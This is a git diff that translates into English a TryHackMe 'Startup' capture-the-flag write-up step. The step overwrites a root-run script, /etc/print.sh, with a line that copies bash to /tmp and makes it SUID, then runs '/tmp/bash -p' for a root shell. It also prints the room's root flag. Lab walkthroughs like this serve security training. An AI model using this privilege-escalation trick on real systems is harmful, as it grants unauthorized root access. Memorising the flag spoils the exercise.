--- a/CTF-TryHackMe/1. Easy/Startup/6. Root flag.md
+++ b/CTF-TryHackMe/1. Easy/Startup/6. Root flag.md
@@ -1,24 +1,36 @@
-1) Nella directory /home/lennie/scripts ho visto un file planner.sh apriamolo:
+1) In the /home/lennie/scripts directory I saw a planner.sh file let's open it:
+```
 cat planner.sh
 #!/bin/bash
 echo $LIST > /home/lennie/scripts/startup_list.txt
 /etc/print.sh
+```
 
-2) Avviamo il comando per modificare modify /etc/print.sh:
+2) Let's run the command to overwrite the /etc/print.sh file:
+```
  echo "cp /bin/bash /tmp && chmod +s /tmp/bash" > /etc/print.sh
+``` 
 
-3) Vediamo se lo script è in esecuzione:
+3) Let's see if the script is running:
+```
 ls -l /tmp 
 total 1016
 -rwsr-sr-x 1 root root 1037528 Sep 28 21:02 bash
+```
 
-4) Ora diventiamo root: 
+4) Now we become root:
+```
 /tmp/bash -p
+```
 
-5) Entriamo nella directory root:
+5) We enter the root directory:
+```
 cd root
+```
 
-6) Apriamo il file root.txt:
+6) Open the file root.txt:
+```
 bash-4.3# cat root.txt
 cat root.txt
 THM{f963aaa6a430f210222158ae15c3d76d}
+```
